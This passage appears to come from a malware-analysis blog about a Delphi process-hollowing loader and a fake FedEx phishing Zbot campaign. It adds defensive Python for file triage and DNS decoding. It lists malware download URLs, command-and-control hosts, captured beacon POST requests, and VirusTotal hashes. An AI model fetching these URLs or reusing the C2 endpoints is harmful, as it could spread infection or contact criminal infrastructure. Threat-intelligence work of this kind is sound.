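The MZP header under a .jpg name and the strings dump above are enough for a first-pass triage of anything pulled from that FTP directory: check the executable magic against the claimed extension, extract printable strings the way strings does, and flag the Delphi markers (MZP stub, "This program must be run under Win32", DVCLAL, PACKAGEINFO, TFORM1) and the NtUnmapViewOfSection import, which alongside VirtualAlloc is the classic process-hollowing loader pair. This is an added example and not the post's code; the sample blob is constructed here and is not a valid PE.

```python
import re

# Markers drawn from the strings dump in this post.
DELPHI_MARKERS = {"This program must be run under Win32", "DVCLAL", "PACKAGEINFO", "TFORM1"}
# APIs a hollowing loader needs: unmap the host image, allocate, write, redirect, resume.
HOLLOWING_APIS = {"NtUnmapViewOfSection", "VirtualAlloc", "WriteProcessMemory",
                  "SetThreadContext", "ResumeThread"}
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png", ".bmp"}
IMAGE_MAGIC = {b"\xff\xd8\xff": ".jpg", b"GIF8": ".gif", b"\x89PNG": ".png", b"BM": ".bmp"}


def extract_strings(data, min_len=4):
    """Minimal 'strings': runs of printable ASCII at least min_len bytes long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def _present(markers, strings):
    # substring match, since import names sit inside longer printable runs
    return sorted(m for m in markers if any(m in s for s in strings))


def triage(data, claimed_name):
    """Compare a file's magic and strings against the name it was served under."""
    ext = ("." + claimed_name.rsplit(".", 1)[-1].lower()) if "." in claimed_name else ""
    strings = extract_strings(data)
    is_pe = data[:2] == b"MZ"
    real_image_ext = next((e for magic, e in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    mismatch = False
    if is_pe and ext in IMAGE_EXTENSIONS:
        mismatch = True                      # executable hiding behind an image name
    elif real_image_ext and ext and ext != real_image_ext and {ext, real_image_ext} != {".jpg", ".jpeg"}:
        mismatch = True                      # image of one type named as another
    return {
        "claimed_ext": ext,
        "is_pe": is_pe,
        "delphi_stub": data[:3] == b"MZP",   # Borland/Delphi linker DOS stub
        "delphi_markers": _present(DELPHI_MARKERS, strings),
        "hollowing_apis": _present(HOLLOWING_APIS, strings),
        "extension_mismatch": mismatch,
    }


# Constructed blob: a Delphi-style DOS stub followed by the strings from the
# dump, separated by NULs as import tables are.  Not a valid PE.
FAKE_PE = (b"MZP\x00\x02\x00\x00\x00\x04\x00\x0f\x00\xff\xff" + b"\x00" * 16
           + b"\xba\x10\x00\x0e\x1f\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
           + b"This program must be run under Win32\r\n$" + b"\x00" * 8
           + b"DVCLAL\x00PACKAGEINFO\x00TFORM1\x00kernel32.dll\x00LoadLibraryA\x00"
           + b"VirtualAlloc\x00VirtualFree\x00ntdll\x00NtUnmapViewOfSection\x00")

# Constructed JPEG-looking header for comparison.
FAKE_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32

if __name__ == "__main__":
    print(triage(FAKE_PE, "E174D3044694.jpg"))
    print(triage(FAKE_JPG, "photo.jpg"))
```

On a real sample you would follow the mismatch hit with a proper PE parser, but the magic/extension check alone catches the "jpg that is really an exe" second stage this post is about.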
      
      
      Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)
      
      
      00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
      00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]
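The hex dump above is a DNS question name in wire format (length-prefixed labels), and the dump is cut off before the root label and QTYPE. As an added example, not code from the post, here is a decoder that rebuilds the bytes from the dump lines, walks the labels, tolerates the truncation, and recovers the address a PTR name stands for. The dump lines are the ones quoted above; that the name starts at byte 6 of the dump is an assumption. Note that in-addr.arpa names carry the octets reversed, so 173.4.250.10.in-addr.arpa is the reverse lookup for 10.250.4.173 (an RFC 1918 address); the post's 173.4.250.10 reads the labels in dump order.

```python
def parse_hexdump(lines):
    """Turn 'offset : xx xx ... [ascii]' lines back into bytes."""
    out = bytearray()
    for line in lines:
        hexpart = line.split(":", 1)[1].split("[", 1)[0]
        out.extend(int(tok, 16) for tok in hexpart.split())
    return bytes(out)


def decode_name(data, offset):
    """Decode a wire-format DNS name at offset.

    Returns (labels, next_offset, terminated); terminated is False when the
    data runs out before the root label, as with the truncated dump.
    """
    labels = []
    i = offset
    while i < len(data):
        n = data[i]
        if n == 0:
            return labels, i + 1, True
        if n & 0xC0:
            # 0xC0 is a compression pointer (never valid in a question name),
            # 0x40/0x80 are reserved
            raise ValueError("bad label length 0x%02x at offset %d" % (n, i))
        i += 1
        chunk = data[i:i + n]
        if len(chunk) < n:
            break  # label cut off by end of dump
        labels.append(chunk.decode("ascii"))
        i += n
    return labels, i, False


def ptr_target(labels):
    """For d.c.b.a.in-addr.arpa return 'a.b.c.d', else None."""
    if len(labels) == 6 and labels[4:] == ["in-addr", "arpa"] and all(l.isdigit() for l in labels[:4]):
        return ".".join(reversed(labels[:4]))
    return None


def decode_ptr_query(dump_lines, name_offset=6):
    data = parse_hexdump(dump_lines)
    labels, _, terminated = decode_name(data, name_offset)
    return {"qname": ".".join(labels), "target": ptr_target(labels), "terminated": terminated}


# The two dump lines from the post; the name begins after the six bytes of
# header tail shown before the first length byte (assumption).
DUMP = [
    "00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]",
    "00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]",
]

if __name__ == "__main__":
    print(decode_ptr_query(DUMP))
```

A reverse lookup for a private address from an infected host is worth noting in its own right; it is more likely the malware resolving something on the local network than a beacon to a carrier range.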
      
      
      
      173.4.250.10
      88.191.130.98:8080
      jindalo.ru:8080
      111.68.142.223
      
      
      
      
      Additional References:
      http://labs.snort.org/iplists/urllist-2012-07-01
      http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/
      http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI
      
      

      Tuesday, March 26, 2013

      Fake FedEx Phishing Zbot


      URL Query Examples:
      http://urlquery.net/search.php?q=fedex_trk&type=string&start=2013-03-11&end=2013-03-26&max=50


      Date (CET)            Alerts / IDS   URL                                                               IP
      2013-03-26 16:38:29   0 / 0          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   208.109.227.206
      2013-03-26 10:18:09   0 / 1          http://ilconline.org/images/fedex_trk_61293150511865307217.zip    208.109.138.8
      2013-03-25 17:26:17   0 / 1          http://ilconline.org/images/fedex_trk_61293150511865307217.zip    208.109.138.8
      2013-03-25 15:32:11   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:26:38   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:21:55   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:18:27   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:12:23   0 / 0          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:10:29   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 15:01:10   0 / 0          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 14:59:39   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50
      2013-03-25 14:47:02   0 / 1          http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip   72.167.183.50

      Go get it

      Offending Hosts:
      178.175.139.47 Taken down
      213.57.77.220  Taken down
      hotels2013.org
      adverts2013.org
      yamaha-motor2013.com

      UPDATE: Callback:
      Date (CET)            Alerts / IDS   URL                                                 IP
      2013-03-31 11:57:12   0 / 1          http://adverts2013.com/pmserver/get.php             213.57.77.220
      2013-03-30 19:26:22   0 / 1          http://geographic-channel.com/pmserver/browse.php   213.57.77.220
      2013-03-30 19:26:09   0 / 1          http://geographic-channel.com/pmserver/browse.php   213.57.77.220
      2013-03-30 19:22:41   0 / 1          http://hotels2013.org/pmserver/browse.php           213.57.77.220
      2013-03-30 19:22:38   0 / 1          http://hotels2013.org/pmserver/browse.php           213.57.77.220
      2013-03-29 17:55:07   0 / 1          http://printing-offices.com/pmserver/backget.php    213.57.77.220
      2013-03-28 14:14:10   0 / 0          http://geographic-channel.com/pmserver/browse.php   213.57.77.220
      2013-03-28 08:12:55   0 / 0          http://hotels2013.org/pmserver/browse.php           213.57.77.220
      2013-03-27 17:57:39   0 / 0          http://adverts2013.com/pmserver/get.php             213.57.77.220
      2013-03-27 16:48:43   0 / 0          http://hotels2013.org/pmserver/browse.php           213.57.77.220
      2013-03-27 16:45:52   0 / 0          http://adverts2013.com/pmserver/get.php             213.57.77.220
      2013-03-27 14:31:09   0 / 0          http://powersock2014.com/pmserver/file.php          213.57.77.220
      2013-03-27 14:22:58   0 / 0          http://printing-offices.com/pmserver/get.php        213.57.77.220
      2013-03-27 14:18:14   0 / 0          http://printing-offices.com/pmserver/backget.php    213.57.77.220
      2013-03-27 13:59:13   0 / 0          http://hotels2013.org/pmserver/browse.php           213.57.77.220
      2013-03-27 07:49:40   0 / 0          http://adverts2013.com/pmserver/get.php             213.57.77.220
      2013-03-27 04:33:37   0 / 0          http://adverts2013.com/pmserver/get.php             213.57.77.220


      PORT    STATE    SERVICE      VERSION
      22/tcp  open     ssh          OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
      80/tcp  open     http         nginx 1.2.7



      inetnum:        178.175.139.32 - 178.175.139.63
      netname:        VPSCORNER-NET
      descr:          VPSCorner
      country:        MD
      admin-c:        CC11822-RIPE
      tech-c:         CC11822-RIPE
      status:         ASSIGNED PA
      mnt-by:         TRABIA-MNT
      changed:        noc@trabia.net 20130318
      source:         RIPE


      Submitted.

      Web Traffic:

      POST /pmserver/browse.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: hotels2013.org
      Content-Length: 119
      Connection: Keep-Alive
      Cache-Control: no-cache


      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:29:45 GMT
      Content-Type: application/octet-stream
      Content-Length: 26704
      Connection: keep-alive
      X-Powered-By: PHP/5.3.23-1~dotdeb.0
      Cache-Control: public
      Content-Disposition: attachment; filename="%2e/files/ftc.jpg"
      Content-Transfer-Encoding: binary





      POST /pmserver/get.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: adverts2013.com
      Content-Length: 380
      Connection: Keep-Alive
      Cache-Control: no-cache



      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:30:16 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive





      POST /pmserver/get.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: adverts2013.com
      Content-Length: 253
      Connection: Keep-Alive
      Cache-Control: no-cache


      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:30:29 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.23-1~dotdeb.0






      VT
      SHA256:98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8
      File name:pon.exe
      Detection ratio:4 / 45
      Analysis date:2013-03-26 16:12:47 UTC ( 1 minute ago )


      https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/


      SHA256:
      fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc
      File name:fedex_trk_61293150511865307217.scr
      Detection ratio:8 / 46
      Analysis date:2013-03-26 01:49:15 UTC ( 14 hours, 3 minutes ago )

      https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/



      SHA256:f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154
      File name:alfasp1alfa3.exe
      Detection ratio:6 / 44
      Analysis date:2013-03-26 16:08:45 UTC ( 1 minute ago )

      https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/